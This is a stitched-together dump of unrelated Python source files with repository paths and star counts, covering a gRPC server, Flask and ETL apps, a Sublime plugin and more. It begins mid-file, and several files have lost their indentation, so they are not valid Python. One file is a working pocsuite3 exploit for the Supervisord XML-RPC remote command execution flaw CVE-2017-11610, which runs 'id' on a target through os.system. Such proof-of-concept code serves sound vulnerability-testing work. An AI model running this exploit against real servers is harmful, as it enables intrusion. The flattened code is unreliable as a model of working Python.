fib_pb2_grpc.add_FibCalculatorServicer_to_server(servicer, server)
try:
server.add_insecure_port(f"{args['ip']}:{args['port']}")
server.start()
print(f"Run gRPC Server for Fibonacci Calculation at {args['ip']}:{args['port']}")
server.wait_for_termination()
except KeyboardInterrupt:
pass
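# Client sketch (illustrative): how a caller might exercise this servicer. The
# request message name FibRequest and its `order` field are inferred from the
# handler above; check the .proto file for the real names.
#
# import grpc
# import fib_pb2
# import fib_pb2_grpc
#
# with grpc.insecure_channel("localhost:8080") as channel:
#     stub = fib_pb2_grpc.FibCalculatorStub(channel)
#     reply = stub.Compute(fib_pb2.FibRequest(order=10))
#     print(reply.value)  # 55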
| 1,598 |
07/solution1.py | k0mmsussert0d/aoc2020 | 0 | 2023373 |
import re
d = {}
def process_line(line):
g = re.search(r'^(.+) bags contain (.+).$', line)
parent = g.group(1)
if g.group(2) == 'no other bags':
children = {}
else:
children = {
typ: int(count) for count, typ in
[re.search(r'^(\d) (.+)$', j).groups() for j in
[i.replace('bags', '').replace('bag', '').replace('.', '').strip() for i in g.group(2).split(',')]]
}
d[parent] = children
def bags_containing_x(x):
res = set()
for bag_name, bags in d.items():
if x in bags:
res.add(bag_name)
res |= bags_containing_x(bag_name)
return res
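# Worked example (illustrative): with
#   d = {'bright white': {'shiny gold': 1}, 'light red': {'bright white': 1}}
# bags_containing_x('shiny gold') returns {'bright white', 'light red'},
# since the recursion also collects every bag that contains a containing bag.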
if __name__ == '__main__':
with open('input1', 'r') as file:
f = file.readlines()
[process_line(l) for l in f]
print(len(bags_containing_x('shiny gold')))
| 847 |
graviteeio_cli/commands/apim/apis/start.py | gravitee-io/gravitee-cli | 12 | 2023557 |
import click
from graviteeio_cli.http_client.apim.api import ApiClient
from ....exeptions import GraviteeioError
@click.command()
@click.option('--api', 'api_id',
help='API id',
required=True)
@click.pass_obj
def start(obj, api_id):
"""Starts an API."""
api_client: ApiClient = obj['api_client']
try:
api_client.start(api_id)
click.echo(f"API [{api_id}] is started.")
except GraviteeioError:
raise GraviteeioError(f"API [{api_id}] could not be started.")
| 526 |
tests/testmanually_entity.py | LegitStack/blink | 0 | 2023711 |
import sys, os
sys.path.append(os.getcwd()) # run from blink/
from node import Entity
from message_board import MSGBoard
import time
def create_basic_entity():
def print_test():
return 'hello_world'
return Entity({
'print_test': (print_test, ((),)),
'print': (print, ('print_test',)),
})
def test_listen():
board = MSGBoard('board')
a = create_basic_entity()
b = create_basic_entity()
b.listen(board)
a.say('print_test', board)
print(board.messages)
time.sleep(2)
a.say('print', board)
time.sleep(2)
a.say('print_test', board)
time.sleep(2)
a.say('print', board)
time.sleep(2)
a.say('print_test', board)
time.sleep(2)
print(board.messages)
def test_listeners():
# OPTIMIZE: a reacts to hearing her own voice - that's not necessary.
board = MSGBoard('board')
a = create_basic_entity()
b = create_basic_entity()
b.listen(board)
a.listen(board)
a.say('print_test', board)
print(board.messages)
time.sleep(2)
a.say('print', board)
time.sleep(2)
a.say('print_test', board)
time.sleep(2)
a.say('print', board)
time.sleep(2)
a.say('print_test', board)
time.sleep(2)
print(board.messages)
def test_listeners_multiple_boards():
board = MSGBoard('board')
requests = MSGBoard('request')
a = create_basic_entity()
b = create_basic_entity()
a.listen(board)
b.listen(board)
a.listen(requests)
b.listen(requests)
a.say('print_test', board)
print(board.messages)
time.sleep(2)
a.say('print', requests)
time.sleep(2)
a.say('print_test', requests)
time.sleep(2)
a.say('print', board)
time.sleep(2)
a.say('print_test', board)
time.sleep(2)
print(board.messages)
print(requests.messages)
#test_listen()
#test_listeners()
test_listeners_multiple_boards()
| 1,904 |
fpipe/meta/modified.py | vkvam/fpipe | 18 | 2022980 |
import datetime
from fpipe.meta.abstract import FileData
class Modified(FileData[datetime.datetime]):
pass
| 114 |
src/stockapp.py | adjeiv/stocks-app | 0 | 2022720 |
import os
import requests
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
import pandas as pd
from stock_graph import create_plot
from bokeh.embed import components
import itertools
from news import get_news
API_KEY = ""
symbol_list = list(pd.read_csv("symbols.csv", names=["sym"])["sym"])
project_dir = os.path.dirname(os.path.abspath(__file__))
database_file = "sqlite:///{}".format(os.path.join(project_dir, "stocks.db"))
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = database_file
db = SQLAlchemy(app)
class Company(db.Model):
__tablename__ = "STOCKS"
country = db.Column(db.String(255), nullable=False)
currency = db.Column(db.String(255), nullable=False)
exchange = db.Column(db.String(255), nullable=False)
ipo = db.Column(db.Integer, nullable=False)
marketCapitalization = db.Column(db.Integer, nullable=False)
name = db.Column(db.String(255), nullable=False)
phone = db.Column(db.Integer, nullable=True)
shareOutstanding = db.Column(db.Integer, nullable=True)
ticker = db.Column(db.String(255), nullable=False, primary_key=True)
weburl = db.Column(db.String(255), nullable=False)
logo = db.Column(db.String(255), nullable=False)
finnhubIndustry = db.Column(db.String(255), nullable=False)
def __repr__(self):
return "<Company name: {}>".format(self.name)
companies = Company.query.all()
news_list = get_news(companies)
@app.route("/", methods=["GET", "POST"])
def home():
companies = Company.query.all()
if request.form:
symbol = request.form.get("symbol").upper()
##now check for validity
if symbol in symbol_list and symbol not in [sym.ticker for sym in companies]:
r = requests.get("https://finnhub.io/api/v1/stock/profile2?symbol=" + symbol + "&token=" + API_KEY)
company = Company(**(r.json()))
db.session.add(company)
db.session.commit()
companies = Company.query.all()
graphs = [create_plot(c.ticker) for c in companies]
graphs = [components(g) for g in graphs]
scrpts = [g[0] for g in graphs]
graphs = [g[1] for g in graphs]
#can send bool flag
return render_template("home.html", companies=companies, graphs=graphs, scrpts=scrpts, news_articles=news_list, num_companies=len(companies), num_news = len(news_list))
if __name__ == "__main__":
app.run(debug=True)
| 2,430 |
lettercounter/__init__.py | flexo/LetterCounter | 0 | 2023125 |
"""LetterCounter: Represent Base 26 as letters of the alphabet
Released under the MIT license:
Copyright (c) <NAME>, 2006, 2007, 2010
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
ASCII_UPPERCASE = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
class LetterIterator(object):
"""Iterates over letters A -> Z, AA -> AZ, BA -> BZ, etc."""
def __init__(self, start='A', end=None, step=1, letters=ASCII_UPPERCASE):
self.started = False
self.current = start
self.end = None
if end:
self.end = end
self.step = step
self.letters = letters
def __iter__(self):
return self
def cycle_character(self, c):
try:
if c == self.letters[-1]:
return self.letters[0]
return self.letters[self.letters.index(c)+1]
except ValueError as e:
raise ValueError(str(e) + ": %c is not in %s" % (c, self.letters))
def _next(self):
# Edge cases:
if self.current == self.end:
raise StopIteration
# Normal behaviour:
for i in range(1, len(self.current)+2):
if i <= len(self.current):
self.current = self.current[:len(self.current)-i] \
+ self.cycle_character(self.current[-i]) \
+ self.current[len(self.current)-i+1:]
if self.current[-i] != self.letters[0]:
# letter was not rolled back to A; we're done.
break
else:
# We've rolled back all the letters, need another column.
self.current = self.letters[0] + self.current
return self.current
def __next__(self):
# First iteration should return first number regardless of step
if not self.started:
self.started = True
return self.current
for i in range(self.step):
next_ = self._next()
return next_
next = __next__
def __cmp__(self, other):
"""Compare to another LetterIterator and return which is higher
according to LetterIterator logic.
The two LetterIterators must use the same letters string.
"""
assert self.letters == other.letters
if len(self.current) > len(other.current):
return 1
elif len(self.current) < len(other.current):
return -1
else:
for pos in range(len(self.current)):
index_self = self.letters.index(self.current[pos])
index_other = other.letters.index(other.current[pos])
if index_self > index_other:
return 1
elif index_self < index_other:
return -1
else:
continue
else:
return 0
class LetterCounter(object):
"""Letter Counter: Represent positive integers as letters
A=0, B, C, ... Z, BA, BB, BC, ...
A is used as a 0, so AAAAAB is the same as B. For more common usage,
use LetterIterator.
"""
letters = ASCII_UPPERCASE
base = 26
def __init__(self, initial=""):
self.value = initial
def __repr__(self):
return 'LetterCounter("'+self.unpad()+'")'
def __str__(self):
return self.value
def __cmp__(self, other):
# match lengths of self.value and other.value
val1 = self.pad(max(len(self.value), len(other.value)))
        val2 = other.pad(max(len(self.value), len(other.value)))
if val1 < val2:
return -1
if val1 == val2:
return 0
if val1 > val2:
return 1
def __bool__(self):
for c in self.value:
if c != 'A':
return True
return False
__nonzero__ = __bool__
def __setattr__(self, name, value):
if name == "value":
object.__setattr__(self, name, value.upper())
def __getattr__(self, name):
if name == "value":
return self.unpad()
def __add__(self, other):
return LetterCounter(self.from_int(int(self) + int(other)))
def __sub__(self, other):
return LetterCounter(self.from_int(int(self) - int(other)))
def __mul__(self, other):
return LetterCounter(self.from_int(int(self) * int(other)))
def __div__(self, other):
return LetterCounter(self.from_int(int(self) / int(other)))
def __mod__(self, other):
return LetterCounter(self.from_int(int(self) % int(other)))
def __pow__(self, other):
return LetterCounter(self.from_int(pow(int(self), int(other))))
def __int__(self):
ret = 0
for v in reversed(range(len(self.value))):
pos = len(self.value) - 1 - v
ret += ( ord(self.value[pos]) - ord('A') ) * self.base**v
return int(ret) # don't return Long if possible
def from_int(cls, value):
"""Returns a string representing the integer provided.
The string can be used to create a new LetterCounter or LetterIterator.
"""
if value < 0:
raise ValueError("value must be >= 0")
i = 7
s = ""
while i >= 0:
d = value//(cls.base**i)
if d > 25:
raise ValueError("value must be <= 208827064575")
s += cls.letters[d]
value = value - d*(cls.base**i)
i -= 1
return s
from_int = classmethod(from_int)
fromInt = from_int # backwards compat.
def pad(self, padding):
v = self.value
while len(v) < padding:
v = "A"+v
return v
def unpad(self):
v = self.value
while v.startswith('A'):
v = v[1:]
return v
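# Usage sketch (illustrative, not part of the upstream module):
#
# it = LetterIterator()
# [next(it) for _ in range(28)][-3:]   # ['Z', 'AA', 'AB']
# LetterCounter.from_int(27)           # 'AAAAAABB' (padded to 8 letters)
# int(LetterCounter('BB'))             # 27, since B=1 and 1*26 + 1 = 27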
| 6,862 |
migration/pocs/supervisord-2017-11610_3_rce.py | cocobear/fuxi | 731 | 2023244 |
#!/usr/bin/env python
# coding: utf-8
import xmlrpc.client
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
class TestPOC(POCBase):
vulID = ''
version = '1.0'
author = 'kcat'
vulDate = '2017-7-24'
createDate = '2020-2-20'
updateDate = '2020-2-20'
references = [
'https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610']
    name = 'CVE-2017-11610 Supervisord remote command execution vulnerability'
appPowerLink = ''
appName = 'Supervisord'
appVersion = '3.x'
vulType = VUL_TYPE.CODE_EXECUTION
category = POC_CATEGORY.EXPLOITS.REMOTE
desc = '''
The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3
allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request,
related to nested supervisord namespace lookups.
    Uses 'poc.py' from https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610 to check whether the target is vulnerable
'''
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [9001]
command = 'id'
for port in ports:
target = "{0}://{1}:{2}/RPC2".format(pr.scheme,
pr.hostname, str(port))
try:
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0, 0)
logfile = getattr(
proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')(
'{} | tee -a {}'.format(command, logfile))
result_ = getattr(proxy, 'supervisor.readLog')(0, 0)
msg = (result_[len(old):])
if 'uid' in msg:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target
result['extra'] = {}
result['extra']['command'] = 'id'
result['extra']['evidence'] = msg
break
except:
pass
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(TestPOC)
| 2,664 |
setup.py | npirzkal/NIRCAM_Gsim | 0 | 2023378 |
import os
from setuptools import setup, Extension, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='NIRCAM_Gsim',
version='1.58',
description='NIRCAM Grism simulator, includes J.D. Smith polyclip C code',
url='https://github.com/npirzkal/GRISM_NIRCAM',
author='<NAME>',
author_email='<EMAIL>',
package_dir = {
'NIRCAM_Gsim': 'NIRCAM_Gsim',
'NIRCAM_Gsim.polyclip': 'NIRCAM_Gsim/polyclip',
'NIRCAM_Gsim.observations': 'NIRCAM_Gsim/observations'},
packages=["NIRCAM_Gsim","NIRCAM_Gsim.polyclip","NIRCAM_Gsim.observations","NIRCAM_Gsim.disperse"],
ext_modules=[Extension('NIRCAM_Gsim.polyclip.polyclip_c', ['NIRCAM_Gsim/polyclip/polyclip_c.c'])],
install_requires=[
"tqdm > 4.0.0",
"grismconf >= 1.24"
],
)
| 1,052 |
locale/pot/api/utilities/_autosummary/pyvista-ParametricBohemianDome-1.py | tkoyama010/pyvista-doc-translations | 4 | 2023542 |
# Create a ParametricBohemianDome mesh.
#
import pyvista
mesh = pyvista.ParametricBohemianDome()
mesh.plot(color='w', smooth_shading=True)
| 139 |
spkcspider/apps/spider/sitemaps.py | devkral/spkbspider | 5 | 2023024 |
__all__ = ["sitemaps", "ComponentSitemap", "ContentSitemap", "HomeSitemap"]
from django.conf import settings
from django.contrib.sitemaps import GenericSitemap, Sitemap
from django.urls import reverse
class ComponentSitemap(GenericSitemap):
priority = 0.3
changefreq = "daily"
date_field = "modified"
if not settings.DEBUG:
protocol = "https"
def __init__(self):
from .models import UserComponent
self.queryset = UserComponent.objects.filter(
public=True
)
class ContentSitemap(GenericSitemap):
priority = 0.7
changefreq = "hourly"
date_field = "modified"
if not settings.DEBUG:
protocol = "https"
def __init__(self):
from .models import AssignedContent
self.queryset = AssignedContent.objects.filter(
usercomponent__public=True
).exclude(info__contains="_unlisted")
class HomeSitemap(Sitemap):
priority = 0.5
changefreq = 'daily'
if not settings.DEBUG:
protocol = "https"
def items(self):
return ['home']
def location(self, item):
return reverse(item)
sitemaps = {
'components': ComponentSitemap,
'contents': ContentSitemap,
'home': HomeSitemap
}
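# Wiring sketch (illustrative): how the `sitemaps` dict above is typically
# exposed in a project URLconf; the urls.py shown here is an assumption, not
# part of this app.
#
# from django.contrib.sitemaps.views import sitemap
# from django.urls import path
# from spkcspider.apps.spider.sitemaps import sitemaps
#
# urlpatterns = [
#     path("sitemap.xml", sitemap, {"sitemaps": sitemaps},
#          name="django.contrib.sitemaps.views.sitemap"),
# ]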
| 1,245 |
etl.py | keyanyang/udacity-data-engineering-capstone | 0 | 2023055 |
import pandas as pd
import os
from dotenv import load_dotenv, find_dotenv
from src.utility import *
from src.data_model import *
# load environment variables
load_dotenv(find_dotenv())
DATABASE_URL = os.getenv("DB_URL")
def main():
"""
- Load data from different sources
- Process Spark Dataframes
- Build the database and tables
"""
spark = create_spark_session()
# read data
df_i94 = spark.read.parquet("./data/raw/sas_data")
df_airport = spark.read.csv("./data/raw/airport-codes_csv.csv", header=True, inferSchema=True)
df_demo = spark.read.csv("./data/raw/us-cities-demographics.csv", header=True, inferSchema=True, sep=';')
df_temp = spark.read.csv("./data/raw/GlobalLandTemperaturesByCity.csv", header=True, inferSchema=True)
# drop duplicates
df_i94 = df_i94.drop_duplicates(['cicid'])
df_airport = df_airport.drop_duplicates(['ident'])
df_demo = df_demo.drop_duplicates(['City', 'State', 'Race'])
df_temp = df_temp.drop_duplicates(['dt', 'City', 'Country'])
# drop missing
df_i94 = df_i94.dropna(how='all')
df_airport = df_airport.dropna(how='all')
df_demo = df_demo.dropna(how='all')
df_temp = df_temp.dropna(how='all')
# drop others
df_i94 = df_i94.drop('occup', 'entdepu','insnum')
df_temp = df_temp.dropna(subset=['AverageTemperature'])
i94port_name_code_dict = build_i94_port_dict('./data/raw/i94port.txt')
i94port_codes = [code for name, code in i94port_name_code_dict.items()]
# clean i94 df
df_i94 = df_i94.filter(df_i94.i94port.isin(i94port_codes))
# create tables
i94_fact = create_i94_fact(df_i94)
visa_dim = create_visa_dim(df_i94)
temperature_dim = create_temperature_dim(df_temp, i94port_name_code_dict)
airport_dim = create_airport_dim(df_airport, i94port_name_code_dict)
demo_dim = create_demographics_dim(df_demo, i94port_name_code_dict)
output_tables = {
"i94_fact": i94_fact,
"visa_dim": visa_dim,
"temperature_dim": temperature_dim,
"airport_dim": airport_dim,
"demo_dim": demo_dim
}
# save data into database
for name, table in output_tables.items():
save_table_to_database(table, name, DATABASE_URL)
print("ETL is completed.")
if __name__ == "__main__":
main()
| 2,323 |
proteinsolver/dashboard/target_selection.py | ostrokach/proteinsolver | 27 | 2022810 |
import ipywidgets as widgets
from IPython.display import HTML, display
from ipywidgets import Layout
import proteinsolver
from proteinsolver.dashboard.state import global_state
def update_target_selection(target_selection_out):
html_string = (
'<p class="myheading">'
"2. (Optional) Specify target amino acids at specific positions "
"(or enter '-' to leave the position open for design)"
"</p>"
)
target_sequence_selection_widget = create_target_selection_widget()
target_selection_out.clear_output(wait=True)
with target_selection_out:
display(HTML(html_string))
display(target_sequence_selection_widget)
def create_target_selection_widget():
def update_target_sequence(change):
residue_idx = int(change["owner"].description.split(" ")[0])
global_state.target_sequence[residue_idx] = change["new"]
target_sequence_ta.value = "".join(global_state.target_sequence)
reference_sequence_ta = widgets.Textarea(
value="".join(global_state.reference_sequence),
placeholder="AAAAA...",
description="<em>Reference</em><br>sequence:",
disabled=True,
layout=widgets.Layout(width="auto"),
)
_ = reference_sequence_ta.add_class("mysequence")
target_sequence_ta = widgets.Textarea(
value="".join(global_state.target_sequence),
placeholder="AAAAA...",
description="<em>Target</em><br>sequence:",
disabled=True,
layout=widgets.Layout(width="auto"),
)
_ = target_sequence_ta.add_class("mysequence")
target_sequence_dropdowns = []
for i, (aa_ref, aa_target) in enumerate(
zip(global_state.reference_sequence, global_state.target_sequence)
):
dropdown = widgets.Dropdown(
options=["-"] + proteinsolver.utils.AMINO_ACIDS,
value=aa_target,
description=f"{i} ({aa_ref})",
# style={},
layout=widgets.Layout(width="120px"),
style={"font_family": "monospace", "font_weight": "bold"},
)
dropdown.observe(update_target_sequence, names="value")
_ = dropdown.add_class("mytext")
target_sequence_dropdowns.append(dropdown)
target_sequence_dropdowns_wg = widgets.HBox(
target_sequence_dropdowns, layout=widgets.Layout(width="100%", flex_flow="row wrap")
)
accordion = widgets.Accordion(
children=[target_sequence_dropdowns_wg], layout=Layout(margin="2px 0px 0px 90px")
)
accordion.set_title(0, "Target residue picker")
accordion.selected_index = None
target_sequence_selection_wg = widgets.VBox(
[widgets.VBox([reference_sequence_ta, target_sequence_ta]), accordion]
)
return target_sequence_selection_wg
| 2,794 |
sb/Data/Packages/Default/Paragraph.py | luc4spas/SISGE-ACONCHEGO | 0 | 2023114 |
import sublime, sublimeplugin
import string
import textwrap
import re
import Comment
def previousLine(view, sr):
"""sr should be a Region covering the entire hard line"""
if sr.begin() == 0:
return None
else:
return view.fullLine(sr.begin() - 1)
def nextLine(view, sr):
"""sr should be a Region covering the entire hard line, including
the newline"""
if sr.end() == view.size():
return None
else:
return view.fullLine(sr.end())
separatingLinePattern = re.compile("^[\\t ]*\\n?$")
def isParagraphSeparatingLine(view, sr):
return separatingLinePattern.match(view.substr(sr)) != None
def hasPrefix(view, line, prefix):
if not prefix:
return True
lineStart = view.substr(sublime.Region(line.begin(),
line.begin() + len(prefix)))
return lineStart == prefix
def expandToParagraph(view, tp):
sr = view.fullLine(tp)
if isParagraphSeparatingLine(view, sr):
return sublime.Region(tp, tp)
requiredPrefix = None
# If the current line starts with a comment, only select lines that are also
# commented
(lineComments, blockComments) = Comment.buildCommentData(view, tp)
dataStart = Comment.advanceToFirstNonWhitespaceOnLine(view, sr.begin())
for c in lineComments:
(start, disableIndent) = c
commentRegion = sublime.Region(dataStart,
dataStart + len(start))
if view.substr(commentRegion) == start:
requiredPrefix = view.substr(sublime.Region(sr.begin(), commentRegion.end()))
break
print "requiring prefix", requiredPrefix
first = sr.begin()
prev = sr
while True:
prev = previousLine(view, prev)
if (prev == None or isParagraphSeparatingLine(view, prev) or
not hasPrefix(view, prev, requiredPrefix)):
break
else:
first = prev.begin()
last = sr.end()
next = sr
while True:
next = nextLine(view, next)
if (next == None or isParagraphSeparatingLine(view, next) or
not hasPrefix(view, next, requiredPrefix)):
break
else:
last = next.end()
return sublime.Region(first, last)
def allParagraphsIntersectingSelection(view, sr):
paragraphs = []
para = expandToParagraph(view, sr.begin())
if not para.empty():
paragraphs.append(para)
while True:
line = nextLine(view, para)
if line == None or line.begin() >= sr.end():
break;
if not isParagraphSeparatingLine(view, line):
para = expandToParagraph(view, line.begin())
paragraphs.append(para)
else:
para = line
return paragraphs
class ExpandSelectionToParagraphCommand(sublimeplugin.TextCommand):
def run(self, view, args):
regions = []
for s in view.sel():
regions.append(sublime.Region(
expandToParagraph(view, s.begin()).begin(),
expandToParagraph(view, s.end()).end()))
for r in regions:
view.sel().add(r)
class WrapLinesCommand(sublimeplugin.TextCommand):
linePrefixPattern = re.compile("^\W+")
def extractPrefix(self, view, sr):
lines = view.splitByNewlines(sr)
if len(lines) == 0:
return None
initialPrefixMatch = self.linePrefixPattern.match(view.substr(
lines[0]))
if not initialPrefixMatch:
return None
prefix = view.substr(sublime.Region(lines[0].begin(),
lines[0].begin() + initialPrefixMatch.end()))
for line in lines[1:]:
if view.substr(sublime.Region(line.begin(),
line.begin() + len(prefix))) != prefix:
return None
return prefix
def widthInSpaces(self, str, tabWidth):
sum = 0;
for c in str:
if c == '\t':
sum += tabWidth
else:
sum += 1
return sum
def run(self, view, args):
width = 70
if len(args) > 0:
# Width has been given as an argument
try:
width = int(args[0])
except ValueError:
pass
elif view.options().getString("rulers"):
# try and guess the wrap width from the ruler, if any
try:
width = int(view.options().getString("rulers"))
except ValueError:
pass
if width == 0:
width = 70
# Make sure tabs are handled as per the current buffer
tabWidth = 8
if view.options().getString("tabSize"):
try:
tabWidth = int(view.options().getString("tabSize"))
except ValueError:
pass
if tabWidth == 0:
            tabWidth = 8
paragraphs = []
for s in view.sel():
paragraphs.extend(allParagraphsIntersectingSelection(view, s))
if len(paragraphs) > 0:
view.sel().clear()
for p in paragraphs:
view.sel().add(p)
# This isn't an ideal way to do it, as we loose the position of the
# cursor within the paragraph: hence why the paragraph is selected
# at the end.
for s in view.sel():
wrapper = textwrap.TextWrapper()
wrapper.expand_tabs = False
wrapper.width = width
prefix = self.extractPrefix(view, s)
if prefix:
wrapper.initial_indent = prefix
wrapper.subsequent_indent = prefix
wrapper.width -= self.widthInSpaces(prefix, tabWidth)
if wrapper.width < 0:
continue
txt = view.substr(s)
if prefix:
txt = txt.replace(prefix, u"")
txt = string.expandtabs(txt, tabWidth)
txt = wrapper.fill(txt) + u"\n"
view.replace(s, txt)
# It's unhelpful to have the entire paragraph selected, just leave the
# selection at the end
ends = [s.end() - 1 for s in view.sel()]
view.sel().clear()
for pt in ends:
view.sel().add(sublime.Region(pt))
| 5,181 |
humfrey/pingback/middleware.py | ox-it/humfrey | 6 | 2023040 |
from django_hosts.reverse import reverse_full
class PingbackMiddleware(object):
def process_response(self, request, response):
response['X-Pingback'] = request.build_absolute_uri(reverse_full('data', 'pingback:xmlrpc'))
return response
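# Configuration sketch (illustrative): process_response without
# __init__(get_response) marks this as old-style middleware, so it would be
# registered via the legacy MIDDLEWARE_CLASSES setting (or wrapped with
# django.utils.deprecation.MiddlewareMixin on newer Django).
#
# MIDDLEWARE_CLASSES = [
#     # ...,
#     'humfrey.pingback.middleware.PingbackMiddleware',
# ]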
| 242 |
settings.py | no-coin-no-life/bitmex-trader-bot | 8 | 2023560 |
from dotenv import load_dotenv
import os
app_home = os.path.abspath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "./"))
env_path = os.path.join(app_home, ".env")
load_dotenv(dotenv_path=env_path)
| 215 |
src/test/testassembly.py | joelphillips/pypyramid | 1 | 2023235 |
'''
Created on Aug 30, 2010
@author: joel
'''
import unittest
import numpy as np
from pypyr.mesh import buildcubemesh
from pypyr.utils import pyramidquadrature, squarequadrature, trianglequadrature, uniformcubepoints
from pypyr.elements import H1Elements, HcurlElements, HdivElements, L2Elements
from pypyr.assembly import SymmetricSystem, AsymmetricSystem
class TestSymmetric(unittest.TestCase):
def testSymmetry(self):
tag = "B1"
for k in range(1,3):
quadrule = pyramidquadrature(k+1)
for N in range(1,3):
for elements in [H1Elements(k), HcurlElements(k), HdivElements(k)]:
system = SymmetricSystem(elements, quadrule, lambda m: buildcubemesh(N, m, tag), [tag])
for deriv in [False, True]:
SM = system.systemMatrix(deriv)
g = lambda x: np.zeros((len(x),1))
S, SIBs, Gs = system.processBoundary(SM, {tag:g})
np.testing.assert_array_almost_equal(SM.todense(), SM.transpose().todense())
np.testing.assert_array_almost_equal(S.todense(), S.transpose().todense())
class TestAsymmetric(unittest.TestCase):
def testSymmetry(self):
tag = "B1"
for k in range(1,3):
quadrule = pyramidquadrature(k+1)
for N in range(1,3):
hdivelt1 = HdivElements(k)
l2elt1 = L2Elements(k)
hdivelt2 = HdivElements(k)
l2elt2 = L2Elements(k)
system = AsymmetricSystem(hdivelt1, l2elt1, quadrule, lambda m:buildcubemesh(N,m,tag), [], [])
systemt = AsymmetricSystem(l2elt2, hdivelt2, quadrule, lambda m:buildcubemesh(N,m,tag), [], [])
SM = system.systemMatrix(True, False)
StM = system.transpose().systemMatrix(False, True)
SMt = systemt.systemMatrix(False, True)
np.testing.assert_array_almost_equal(SM.todense(), SMt.transpose().todense())
np.testing.assert_array_almost_equal(StM.todense(), SMt.todense())
| 2,226 |
app/tweet_collection_v2/stream_listener.py
|
s2t2/tweet-analyzer-py
| 5 |
2022964
|
import os
from pprint import pprint
from time import sleep
from dotenv import load_dotenv
from tweepy.streaming import StreamListener
from tweepy import Stream
from urllib3.exceptions import ProtocolError
from app import seek_confirmation
from app.twitter_service import TwitterService
from app.bq_service import BigQueryService, generate_timestamp
from app.tweet_collection_v2.csv_storage import LocalStorageService
from app.tweet_collection_v2.tweet_parser import parse_status
load_dotenv()
STORAGE_ENV = os.getenv("STORAGE_ENV", default="local") # "local" OR "remote"
BATCH_SIZE = int(os.getenv("BATCH_SIZE", default="20"))
class TopicResetEvent(Exception):
pass
class TweetCollector(StreamListener):
def __init__(self, twitter_service=None, storage_env=STORAGE_ENV, bq_service=None, csv_service=None, batch_size=BATCH_SIZE):
self.twitter_service = twitter_service or TwitterService()
self.api = self.twitter_service.api
self.auth = self.api.auth
self.parse_status = parse_status
self.storage_env = storage_env
if self.storage_env == "local":
self.storage_service = csv_service or LocalStorageService()
elif self.storage_env == "remote":
self.storage_service = bq_service or BigQueryService()
else:
raise ValueError("Expecting the STORAGE_ENV to be 'local' or 'remote'. Please try again...")
self.batch_size = batch_size
self.batch = []
self.counter = 0
print("-------------------------------")
print("STREAM LISTENER...")
print(" STORAGE ENV:", self.storage_env.upper())
print(" STORAGE SERVICE:", type(self.storage_service))
print(" BATCH SIZE:", self.batch_size)
print("--------------------------------")
def set_topics(self):
self.topics = self.storage_service.fetch_topic_names()
print("SET TOPICS:", self.topics)
def reset_topics(self):
self.set_topics()
raise TopicResetEvent("Let's trigger the listener to re-start in a kind of hacky way :-D")
#
# LISTEN FOR TWEETS AND COLLECT THEM
#
def on_connect(self):
print("LISTENER IS CONNECTED!")
def on_status(self, status):
"""Param status (tweepy.models.Status)"""
if self.is_collectable(status):
self.counter +=1
print("----------------")
print(f"DETECTED AN INCOMING TWEET! ({self.counter} -- {status.id_str})")
self.collect_in_batches(status)
@staticmethod
def is_collectable(status):
"""Param status (tweepy.models.Status)"""
return (status.lang == "en"
#and status.user.verified
#and status.in_reply_to_status_id == None
#and status.in_reply_to_user_id == None
#and status.in_reply_to_screen_name == None
#and status.is_quote_status == False
#and status.retweeted == False
#and not hasattr(status, "retweeted_status")
)
def collect_in_batches(self, status):
"""
Param status (tweepy.models.Status)
Moving this logic out of on_status in hopes of preventing ProtocolErrors
Storing in batches to reduce API calls, and in hopes of preventing ProtocolErrors
"""
self.batch.append(self.parse_status(status))
if len(self.batch) >= self.batch_size:
self.store_and_clear_batch()
def store_and_clear_batch(self):
print("STORING BATCH OF", len(self.batch), "TWEETS...")
self.storage_service.append_tweets(self.batch)
print("CLEARING BATCH...")
self.batch = []
self.counter = 0
#
# HANDLE ERRORS
#
def on_exception(self, exception):
# has encountered errors:
# + urllib3.exceptions.ProtocolError: ('Connection broken: IncompleteRead(0 bytes read)'
# + urllib3.exceptions.ReadTimeoutError: HTTPSConnectionPool
print("EXCEPTION:", type(exception))
print(exception)
def on_error(self, status_code):
print("ERROR:", status_code)
def on_limit(self, track):
"""Param: track (int) starts low and subsequently increases"""
